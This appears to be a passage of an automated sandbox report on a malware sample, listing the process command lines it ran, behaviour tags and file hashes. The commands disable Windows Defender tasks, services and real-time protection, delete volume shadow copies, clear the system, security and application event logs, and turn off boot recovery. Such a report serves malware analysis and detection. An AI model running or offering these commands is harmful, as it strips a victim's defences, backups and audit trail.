    [2] C:\Windows\SYSTEM32\schtasks.exe  (PID 2288)
        command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    [2] C:\Windows\SYSTEM32\schtasks.exe  (PID 3972)
        command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    [2] C:\Windows\SYSTEM32\schtasks.exe  (PID 2220)
        command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    [2] C:\Windows\SYSTEM32\schtasks.exe  (PID 2024)
        command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 728)
        command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 1568)
        command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 920)
        command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3312)
        command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        - Modifies registry class
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 1360)
        command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        - Modifies registry class
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 1712)
        command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        - Modifies registry class
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 4068)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3308)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 2528)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3000)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 2272)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        - Modifies security service
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 380)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\SYSTEM32\vssadmin.exe
        command line: vssadmin.exe delete shadows /all /quiet
- Interacts with shadow copies
PID:376 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3220 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3120 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3048 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2900
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3260 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:980 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:4092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3188
Network
MITRE ATT&CK Enterprise v6
Downloads
MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

MD5 1eff030d649b7120d7e5fa8fb2be0154
SHA1 e96442fd73dcb64d6194155f2165fd61b3c482fa
SHA256 eb55bfcfa829939b1647fc9753e628aff2d6a2e6a6fa88a9dafbe5a8489a9a3d
SHA512 a5141f2570a58e2b86176b02ec03718c9452d095da52f930c3c48648c76b117465b290539054aa75667f33e746b91f37730aa387e2a9c41a10589ff66edb444a